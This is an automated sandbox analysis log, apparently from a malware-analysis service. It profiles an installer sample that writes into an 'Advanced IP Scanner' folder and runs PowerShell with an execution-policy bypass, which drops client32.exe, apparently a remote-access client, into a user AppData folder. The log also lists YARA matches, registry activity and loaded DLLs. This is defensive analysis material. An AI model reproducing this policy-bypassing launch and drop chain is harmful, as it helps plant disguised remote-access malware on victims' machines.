                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_11032A608_2_11032A60
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_11086DA08_2_11086DA0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_11044C608_2_11044C60
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeProcess token adjusted: SecurityJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: String function: 685A7A90 appears 62 times
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: String function: 685930A0 appears 54 times
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: String function: 11142A60 appears 1055 times
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: String function: 685BF3CB appears 33 times
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: String function: 685A7C70 appears 36 times
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: String function: 1116B7E0 appears 54 times
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: String function: 111434D0 appears 42 times
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: String function: 11160790 appears 64 times
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: String function: 685A7D00 appears 135 times
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: String function: 685B9480 appears 60 times
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: String function: 68596F50 appears 171 times
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: String function: 11080C50 appears 64 times
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: String function: 1115CBB3 appears 92 times
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: String function: 110290F0 appears 1919 times
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: String function: 1105D340 appears 492 times
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: String function: 1109CBD0 appears 32 times
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: String function: 1105D470 appears 41 times
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: String function: 11027550 appears 94 times
                                  Source: KC0uZWwr8p.exeStatic PE information: invalid certificate
                                  Source: KC0uZWwr8p.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                                  Source: is-LEVQP.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                                  Source: KC0uZWwr8p.tmp.0.drStatic PE information: Number of sections : 11 > 10
                                  Source: is-LEVQP.tmp.1.drStatic PE information: Number of sections : 11 > 10
                                  Source: KC0uZWwr8p.exeStatic PE information: Number of sections : 11 > 10
                                  Source: is-QDVS6.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-5URF2.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-U7801.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-012CR.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-JOPC8.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-V3C3T.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-56HU1.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-5C3J6.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-14FKM.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-IVQT8.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-5BNS6.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-P2PON.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-TE3AT.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-MB1RQ.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-RT7U6.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-ET1Q4.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-I1VEE.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-IK3SG.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-AQQBN.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-QAKOH.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-5KHP2.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-FLT6F.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-593G3.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-NB2QQ.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-MR0EO.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-495HA.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-DLE8L.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-5JUJC.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-FNUE4.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-2QTH6.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-6H7V6.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-4U5GH.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-UCVS8.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-QVRL0.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-2QS06.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-A7U9L.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-V71S3.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-HA61E.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-9GMK5.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: is-L4L9S.tmp.1.drStatic PE information: No import functions for PE file found
                                  Source: KC0uZWwr8p.exe, 00000000.00000000.1642880189.00000000006E9000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs KC0uZWwr8p.exe
                                  Source: KC0uZWwr8p.exe, 00000000.00000003.1647342710.0000000002C0F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs KC0uZWwr8p.exe
                                  Source: KC0uZWwr8p.exe, 00000000.00000003.1648007586.000000007EE1B000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs KC0uZWwr8p.exe
                                  Source: KC0uZWwr8p.exeBinary or memory string: OriginalFileName vs KC0uZWwr8p.exe
                                  Source: KC0uZWwr8p.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  Source: amsi32_5448.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                                  Source: Process Memory Space: powershell.exe PID: 5448, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                                  Source: classification engineClassification label: mal60.rans.spre.troj.evad.winEXE@10/299@3/3
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_11059270 GetLastError,FormatMessageA,LocalFree,7_2_11059270
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_1109C750 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,7_2_1109C750
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_1109C7E0 AdjustTokenPrivileges,CloseHandle,7_2_1109C7E0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_1109C750 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,8_2_1109C750
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_1109C7E0 AdjustTokenPrivileges,CloseHandle,8_2_1109C7E0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_11095C90 GetTickCount,CoInitialize,CLSIDFromProgID,CoCreateInstance,CoUninitialize,7_2_11095C90
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_11088290 FindResourceA,LoadResource,LockResource,7_2_11088290
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP ScannerJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\installPackage.zipJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeMutant created: NULL
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2588:120:WilError_03
                                  Source: C:\Users\user\Desktop\KC0uZWwr8p.exeFile created: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmpJump to behavior
                                  Source: C:\Users\user\Desktop\KC0uZWwr8p.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                  Source: C:\Users\user\Desktop\KC0uZWwr8p.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile read: C:\Program Files (x86)\desktop.iniJump to behavior
                                  Source: C:\Users\user\Desktop\KC0uZWwr8p.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
                                  Source: KC0uZWwr8p.exeReversingLabs: Detection: 18%
                                  Source: KC0uZWwr8p.exeString found in binary or memory: /LOADINF="filename"
                                  Source: C:\Users\user\Desktop\KC0uZWwr8p.exeFile read: C:\Users\user\Desktop\KC0uZWwr8p.exeJump to behavior
                                  Source: unknownProcess created: C:\Users\user\Desktop\KC0uZWwr8p.exe "C:\Users\user\Desktop\KC0uZWwr8p.exe"
                                  Source: C:\Users\user\Desktop\KC0uZWwr8p.exeProcess created: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp "C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp" /SL5="$20430,18032967,815616,C:\Users\user\Desktop\KC0uZWwr8p.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-AG44P.tmp\ExtractedContent.ps1"
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe "C:\Users\user\AppData\Roaming\SystemUtil\client32.exe"
                                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe "C:\Users\user\AppData\Roaming\SystemUtil\client32.exe"
                                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe "C:\Users\user\AppData\Roaming\SystemUtil\client32.exe"
                                  Source: C:\Users\user\Desktop\KC0uZWwr8p.exeProcess created: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp "C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp" /SL5="$20430,18032967,815616,C:\Users\user\Desktop\KC0uZWwr8p.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-AG44P.tmp\ExtractedContent.ps1"Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe "C:\Users\user\AppData\Roaming\SystemUtil\client32.exe" Jump to behavior
                                  Source: C:\Users\user\Desktop\KC0uZWwr8p.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\Desktop\KC0uZWwr8p.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpSection loaded: mpr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpSection loaded: winhttp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpSection loaded: wtsapi32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpSection loaded: winsta.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpSection loaded: textinputframework.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpSection loaded: coreuicomponents.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpSection loaded: textshaping.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpSection loaded: dwmapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpSection loaded: shfolder.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpSection loaded: explorerframe.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpSection loaded: sfc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpSection loaded: propsys.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpSection loaded: linkinfo.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpSection loaded: ntshrui.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpSection loaded: cscapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpSection loaded: edputil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpSection loaded: slc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpSection loaded: sppc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: pcicl32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: shfolder.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: pcichek.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: pcicapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: winmm.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: wsock32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: netapi32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: wininet.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: msvcr100.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: msvcr100.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: samcli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: dbghelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: dbgcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: wtsapi32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: nslsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: devobj.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: pcihooks.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: textshaping.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: winsta.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: wbemcomn.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: riched32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: riched20.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: usp10.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: msls31.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: napinsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: pnrpnsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: wshbth.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: nlaapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: winrnr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: pciinv.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeSection loaded: firewallapi.dllJump to behavior
